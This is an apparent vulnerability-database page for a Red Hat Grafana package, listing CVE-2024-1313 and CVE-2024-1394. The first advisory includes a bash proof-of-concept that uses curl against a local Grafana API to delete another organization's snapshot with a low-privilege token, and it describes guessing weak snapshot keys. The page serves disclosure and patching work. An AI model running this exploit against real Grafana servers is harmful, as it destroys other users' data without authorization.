Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:rpm/redhat/grafana@9.2.10-16?arch=el9_4
purl pkg:rpm/redhat/grafana@9.2.10-16?arch=el9_4
Next non-vulnerable version None.
Latest non-vulnerable version None.
Risk 4.0
Vulnerabilities affecting this package (2)
Vulnerability Summary Fixed by
VCID-271j-tym1-pkdr
Aliases:
CVE-2024-1313
GHSA-67rv-qpw2-6qrr
Grafana: Users outside an organization can delete a snapshot with its key ### Summary The ***DELETE /api/snapshots/{key}*** endpoint allows any Grafana user to delete snapshots if the user is NOT in the organization of the snapshot ### Details An attacker (a user without organization affiliation or with a "no basic role" in an organization other than the one where the dashboard exists), knowing the key or URL of a snapshot created by any user (including Grafana admins), can delete a snapshot (It is not feasible using UI), resulting in a BOLA vulnerability. If an attacker is in the same organization of the dashboard snapshot, he can’t delete the snapshot. However, an attacker with low-privilege from a different organization would be able to delete it, resulting in the authorization flaw. ![Screenshot 2024-01-19 at 3 50 23 PM](https://user-images.githubusercontent.com/58054904/298194695-bea8ab57-8504-4f5d-9468-cef7acf8622b.png) ### Precondition To exploit this endpoint, an attacker must know the {key} of a snapshot. The attacker can potentially discover this key in various ways. When [creating a snapshot through the API](https://grafana.com/docs/grafana/latest/developers/http_api/snapshot/), users can manually specify a key without any complexity requirements. This lack of complexity makes this key susceptible to brute force attacks. For example, simplistic keys such as "customer_key_123" or "admin_snap" can be easily guessed. These predictable keys allow low-privileged attackers to perform brute-force attacks using common keywords, potentially leading to compromised data integrity. In addition, this key is displayed in plain text in the URL of a snapshot. This means that if a user publicly displays a snapshot, viewers might note down the key. Furthermore, since the snapshot feature is often used for sharing, displaying, and backing up data, a low-privileged attacker could potentially find snapshot keys in places like the organization's content management system, messaging platform, or shared documents. ### PoC ``` #!/bin/bash -x # /snapshots/{key}: {'delete': {'success_status_code': 200, 'exec_paths': ['post /snapshots']}} # 2d92c726-bf3c-4f20-b979-37bdf81d68c7 # Authentication stage # User A - Grafana Admin user_a_token="YWRtaW46YWRtaW4xMjM=" # User B - User with no permissions , which is not part of any org user_b_token="YmJiOmJiYmJiYmJiYg==" # Create snapshot current_date=$(date +%Y-%m-%d-%H-%M-%S) random_string="random-${current_date}" snapshot_data='{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","snapshotData":[],"type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"fiscalYearStartMonth":0,"graphTooltip":0,"id":1517,"links":[],"liveNow":false,"panels":[{"aliasColors":{},"bars":false,"dashLength":10,"dashes":false,"datasource":null,"fill":1,"fillGradient":0,"gridPos":{"h":7,"w":24,"x":0,"y":0},"hiddenSeries":false,"id":4,"legend":{"alignAsTable":true,"avg":false,"current":true,"max":false,"min":false,"rightSide":true,"show":true,"total":false,"values":true},"lines":true,"linewidth":1,"links":[],"nullPointMode":"null","options":{"alertThreshold":true},"percentage":false,"pluginVersion":"10.2.3","pointradius":2,"points":false,"renderer":"flot","seriesOverrides":[],"snapshotData":[{"fields":[{"config":{},"name":"time","type":"time","values":[1704380420234,1704380420334,1704380420434,1704380420534,1704380420634,1704380420734,1704380420834,1704380566535,1704380566635,1704380566735,1704380566835,1704380566935,1704380567035,1704380567135,1704380567235,1704380567335,1704380567435,1704380567535,1704380567635,1704380567735,1704380567835,1704380567935,1704380568035,1704380568135,1704380568235,1704380568335,1704380568435,1704380568535,1704380568635,1704380568735,1704380568835,1704380568935,1704380569035,1704380569135,1704380569235,1704380569335,1704380569435,1704380569535,1704380569635,1704380569735,1704380569835,1704380569935,1704380570035,1704380570135,1704380570235,1704380570335,1704380570435,1704380570535,1704380570635,1704380570735,1704380570835,1704380570935,1704380571035,1704380571135,1704380571235,1704380571335,1704380571435,1704380571535,1704380571635,1704380571735,1704380571835,1704380571935,1704380572035,1704380572135,1704380572235,1704380572335,1704380572435,1704380572535,1704380572635,1704380572735,1704380572835,1704380572935,1704380573035,1704380573135,1704380573235,1704380573335,1704380573435,1704380573535,1704380573635,1704380573735,1704380573835,1704380573935,1704380574035,1704380574135,1704380574235,1704380574335,1704380574435,1704380574535,1704380574635,1704380574735,1704380574835,1704380574935,1704380575035,1704380575135,1704380575235,1704380575335,1704380575435,1704380575535,1704380575635,1704380575735,1704380575835,1704380575935,1704380576035,1704380576135,1704380576235,1704380576335,1704380576435,1704380576535,1704380576635,1704380576735,1704380576835,1704380576935,1704380577035,1704380577135,1704380577235,1704380577335,1704380577435,1704380577535,1704380577635,1704380577735,1704380577835,1704380577935,1704380578035,1704380578135,1704380578235,1704380578335,1704380578435,1704380578535,98.36651881887735,90.90520552302428,100.73967111022498,109.89826524946163,102.00960918579666,106.33530882778683,106.52629457166695,109.56323497328492,116.87832749309237,115.14116509660076,115.70457190523986,118.1091621354617,113.9144753018141,117.58351263310455,117.38409043570634,126.94212224196508,134.50552909930198,127.97490160986311,123.5784401639683,125.31012734609902,118.56171579412602,122.71596068271737,116.11258334902308,118.07532920254557,113.5755959893507,117.02863610131872,122.42991477107806,124.68121765645371,121.45599945829102,120.93643213038477,118.75961398984585,118.70214867496358,116.1085878323934,109.08837112411643,111.90652582288098,109.69360084697551,113.57752983270163,121.0455900847171,116.98257636596624,118.33231004235124,128.19430473604484,119.7539320116394,120.39948913692677,117.05787774775756,109.29564979026497,119.08806090022262,111.20930907183256,104.99629052804383,96.05550719780628,87.99845374253385,83.19203585736912,83.13916797842998,-70.53615047052016,-73.3850420187272]}],"meta":{},"refId":"A"}],"spaceLength":10,"stack":false,"steppedLine":false,"targets":[],"thresholds":[],"timeRegions":[],"title":"Simple dummy streaming example","tooltip":{"shared":true,"sort":0,"value_type":"individual"},"type":"graph","xaxis":{"mode":"time","show":true,"values":[]},"yaxes":[{"format":"short","logBase":1,"show":true},{"format":"short","logBase":1,"show":true}],"yaxis":{"align":false}}],"refresh":"","schemaVersion":39,"snapshot":{"timestamp":"2024-01-04T15:03:04.128Z"},"tags":[],"templating":{"list":[]},"time":{"from":"2024-01-04T15:02:08.132Z","to":"2024-01-04T15:03:08.132Z","raw":{"from":"now-1m","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Simple Streaming Example Snapshot","uid":"TXSTREZ","version":1,"weekStart":""},"name":"Simple Streaming Example Snapshot", "expires":0, "key":"admin_key"}' create_snapshot_response=$(curl -s -X POST "http://localhost:3000/api/snapshots" -H "Authorization: Basic ${user_a_token}" -H "Content-Type: application/json" -d "${snapshot_data}") # Extract key from create snapshot response key=$(echo "$create_snapshot_response" | jq -r '.key') # Delete snapshot delete_snapshot_response=$(curl -s -X DELETE "http://localhost:3000/api/snapshots/${key}" -H "Authorization: Basic ${user_b_token}" -o /dev/null -w "%{http_code}") # Check if the test passed if [ "$delete_snapshot_response" -eq 200 ]; then echo -e "\033[32mTest was passed, BOLA\033[0m" fi ``` There are no reported fixed by versions.
VCID-6nrn-u58x-mben
Aliases:
CVE-2024-1394
GHSA-78hx-gp6g-7mj6
Memory leaks in code encrypting and verifying RSA payloads Using crafted public RSA keys which are not compliant with SP 800-56B can cause a small memory leak when encrypting and verifying payloads. An attacker can leverage this flaw to gradually erode available memory to the point where the host crashes for lack of resources. Upon restart the attacker would have to begin again, but nevertheless there is the potential to deny service. There are no reported fixed by versions.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-01T13:48:56.105584+00:00 RedHat Importer Affected by VCID-6nrn-u58x-mben https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1394.json 38.0.0
2026-04-01T13:48:49.196980+00:00 RedHat Importer Affected by VCID-271j-tym1-pkdr https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1313.json 38.0.0